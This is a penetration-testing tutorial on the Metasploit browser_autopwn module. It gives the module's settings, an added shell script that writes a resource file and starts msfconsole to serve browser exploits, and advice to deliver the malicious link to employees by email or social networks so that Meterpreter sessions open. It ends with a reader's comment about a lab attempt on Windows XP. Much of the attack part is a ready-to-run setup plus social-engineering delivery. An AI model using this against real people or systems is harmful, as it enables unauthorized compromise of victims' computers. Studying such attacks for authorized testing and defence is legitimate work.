Nowadays, firewall restrictions and patch management policies have made direct exploitation of systems much more difficult. One of the most efficient alternatives is the client-side attack. Client-side attacks require user interaction and in most cases are delivered through social engineering engagements. An employee who lacks the knowledge to understand the risks of opening an untrusted link can help an attacker compromise internal systems. The fact that browsers are not patched as often as operating systems makes the problem worse.
In this article we will examine the effectiveness of the Metasploit browser_autopwn module. The basic idea behind this module is that it starts a web server on our local machine that hosts a collection of browser exploits. When the user opens the malicious link, the exploits are launched against the user's browser, and if one of them succeeds a Meterpreter session is opened.
In order to use this attack we have to open the Metasploit Framework and select the browser_autopwn module (auxiliary/server/browser_autopwn). The next image shows the available options and the default settings for this module.
We set LHOST to our IP address, SRVPORT to 80 (otherwise the link we send to the user must be in the format IP:8080, since 8080 is the default port) and URIPATH to / so that Metasploit does not generate a random URL. Note that binding to port 80 requires running msfconsole as root.
After executing the module we will notice that exploits for a variety of browsers are loaded into our web server.
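As an added example that is not part of the original article, the following shell script generates a Metasploit resource script with the options set above (LHOST, SRVPORT 80, URIPATH /) and hands it to msfconsole. The helper names, the temporary-file location and the IP address 192.168.1.2 in the usage line are assumptions; the module path and option names are those of browser_autopwn.

```shell
#!/bin/sh
# Added example (not the article's own code): build a Metasploit resource
# script for auxiliary/server/browser_autopwn and launch msfconsole with it.
# Assumptions: msfconsole is on PATH; the attacker IP used in the usage
# line (192.168.1.2) is made up.

# write_autopwn_rc LHOST SRVPORT URIPATH OUTFILE
# Writes the msfconsole commands to OUTFILE; returns 1 on bad arguments.
write_autopwn_rc() {
    lhost=$1; srvport=$2; uripath=$3; out=$4
    if [ -z "$lhost" ] || [ -z "$uripath" ] || [ -z "$out" ]; then
        echo "usage: write_autopwn_rc LHOST SRVPORT URIPATH OUTFILE" >&2
        return 1
    fi
    # SRVPORT is the port the victim's browser connects to; it must be numeric
    case $srvport in
        ''|*[!0-9]*) echo "SRVPORT must be numeric, got '$srvport'" >&2; return 1 ;;
    esac
    cat >"$out" <<EOF
use auxiliary/server/browser_autopwn
set LHOST $lhost
set SRVPORT $srvport
set URIPATH $uripath
run -j
EOF
}

# launch_autopwn LHOST SRVPORT URIPATH
# Writes the resource script to a temp file and starts msfconsole with it.
launch_autopwn() {
    rc=$(mktemp "${TMPDIR:-/tmp}/autopwn.XXXXXX") || return 1
    write_autopwn_rc "$1" "$2" "$3" "$rc" || return 1
    if ! command -v msfconsole >/dev/null 2>&1; then
        echo "msfconsole not found; resource script left at $rc" >&2
        return 1
    fi
    # Ports below 1024 need root to bind; warn rather than fail silently later
    if [ "$2" -lt 1024 ] && [ "$(id -u)" -ne 0 ]; then
        echo "warning: SRVPORT $2 needs root to bind" >&2
    fi
    msfconsole -q -r "$rc"
}

# Usage: sh autopwn.sh 192.168.1.2 80 /
if [ "$#" -eq 3 ]; then
    launch_autopwn "$@"
fi
```

With SRVPORT 80 and URIPATH / the link sent to the target is simply http://LHOST/ ; the module then prints the URL it is serving and keeps running as a background job so that incoming sessions are handled while you wait.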
Now we can send the link by email to the client's employees. If any user opens the malicious link, the autopwn module tries each of these exploits to see whether it can break into the client. If the browser is vulnerable to any of them, Meterpreter sessions will open.
Browser-based attacks are not stable: the browser can crash, which means the Meterpreter session or shell access is lost. For that reason Metasploit migrates the payload into another, more stable process as soon as possible.
Most organizations sit behind proxy firewalls that only allow port 80 outbound. On the other hand, many employees use social networks these days for various reasons. An attacker can exploit this by sending malicious links to users through social networks, so this attack can be very effective against companies: it contains exploits for most of the popular browsers and only needs one person to make a mistake in order to succeed. The Metasploit browser_autopwn module is proof of how dangerous it is to open links that come from untrusted sources.
I tried using the exploit, but when I open the URL on the victim PC (a VM instance of Win XP SP1), in my msfconsole I get the message "handling request from 192.168.1.3" (the IP of XP) and nothing happens.